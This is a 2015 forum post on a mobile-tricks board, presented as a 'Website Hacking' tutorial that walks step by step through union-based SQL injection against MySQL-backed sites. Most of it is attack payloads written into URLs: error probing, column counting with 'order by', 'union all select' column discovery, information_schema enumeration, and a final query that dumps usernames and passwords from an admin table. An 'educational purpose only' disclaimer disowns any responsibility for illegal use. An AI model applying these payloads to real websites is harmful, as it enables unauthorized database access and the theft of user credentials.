Website Hacking*

Tricks Duniya -ONLINE SHOPPING GUIDE, MOBILE TRICKS, ANDROID TRICKS, HACKING > MOBILE ZONE > USEFUL APP'S AND TIPS update's > Website Hacking* >

Replies: 0 views: 347

Thread Rating:

0 Vote(s) - 0 Average
1
2
3
4
5

Website Hacking*

Threaded Mode | Linear Mode

Facebook Share

10-30-2015, 08:11 PM,

Offline

Yovt

Member

Joined: Apr 2015

Mesajlar : 138

Konular:

Rep Puanı: 4

Points: 0₹
Points: 0₹

9560706175

Website Hacking*

Website Hacking

Learn How To Hack Websites With Different
Techniques.. (EDUCATIONAL PURPOSE
ONLY)
SQL Injection in MySQL Databases :-
SQL Injection attacks are code injections
that exploit the database layer of the
application. This is most commonly the
MySQL database, but there are techniques
to carry out this attack in other databases
such as Oracle. In this tutorial i will be
showing you the steps to carry out the
attack on a MySQL Database.
Step 1:
When testing a website for SQL Injection
vulnerabilities, you need to find a page that
looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a
number or a string, but most commonly a
number. Once you have found a page like
this, we test for vulnerability by simply
entering a ' after the number in the url. For
example:
www.site.com/page=1'
If the database is vulnerable, the page will
spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied
argument is not a valid MySQL result
resource in /home/wwwprof/public_html/
readnews.php on line 29
If the page loads as normal then the
database is not vulnerable, and the website
is not vulnerable to SQL Injection.
Step 2
Now we need to find the number of union
columns in the database. We do this using
the "order by" command. We do this by
entering "order by 1--", "order by 2--" and
so on until we receive a page error. For
example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here,
then that means we have 4 columns. If the
site errored on "order by 9" then we would
have 8 columns. If this does not work,
instead of -- after the number, change it
with /*, as they are two difference prefixes
and if one works the other tends not too. It
just depends on the way the database is
configured as to which prefix is used.
Step 3
We now are going to use the "union"
command to find the vulnerable columns.
So we enter after the url, union all select
(number of columns)--,
for example:
www.site.com/page=1 union all select
1,2,3,4--
This is what we would enter if we have 4
columns. If you have 7 columns you would
put,union all select 1,2,3,4,5,6,7-- If this is
done successfully the page should show a
couple of numbers somewhere on the page.
For example, 2 and 3. This means columns
2 and 3 are vulnerable.
Step 4
We now need to find the database version,
name and user. We do this by replacing the
vulnerable column numbers with the
following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select
1,user(),version(),4--
The resulting page would then show the
database user and then the MySQL version.
For example admin@localhost and MySQL
5.0.83.
IMPORTANT: If the version is 5 and above
read on to carry out the attack, if it is 4
and below, you have to brute force or guess
the table and column names, programs can
be used to do this.
Step 5
In this step our aim is to list all the table
names in the database. To do this we enter
the following command after the url.
UNION SELECT 1,table_name,3,4 FROM
information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT
1,table_name,3,4 FROM
information_schema.tables--
Remember the "table_name" goes in the
vulnerable column number you found
earlier. If this command is entered
correctly, the page should show all the
tables in the database, so look for tables
that may contain useful information such as
passwords, so look for admin tables or
member or user tables.
Step 6
In this Step we want to list all the column
names in the database, to do this we use
the following command:
union all select 1,2,group_concat
(column_name),4 from
information_schema.columns where
table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select
1,2,group_concat(column_name),4 from
information_schema.columns where
table_schema=database()--
This command makes the page spit out ALL
the column names in the database. So
again, look for interesting names such as
user,email and password.
Step 7
Finally we need to dump the data, so say
we want to get the "username" and
"password" fields, from table "admin" we
would use the following command,
union all select 1,2,group_concat
(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select
1,2,group_concat
(username,0x3a,password),4 from admin--
Here the "concat" command matches up
the username with the password so you
dont have to guess, if this command is
successful then you should be presented
with a page full of usernames

*=only for educational purpose I am not responsible for what u do with did legal or illegal

Possibly Related Threads…
Learn Free Ethical Hacking Using Your Android

10-30-2015, 08:11 PM

« Next Oldest | Next Newest »

Users browsing this thread: 2 Guest(s)

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Learn Free Ethical Hacking Using Your Android	Red	0	455	09-28-2015, 12:58 PM Last Post: Red
	How to Find Server IP of Any WebSite – Reverse Ip Lookup	Pammy	0	388	09-09-2015, 10:46 AM Last Post: Pammy
	Block any Website in your UC browser (tutorial)	Mack Doun	0	391	05-23-2015, 10:07 AM Last Post: Mack Doun

Forum Jump: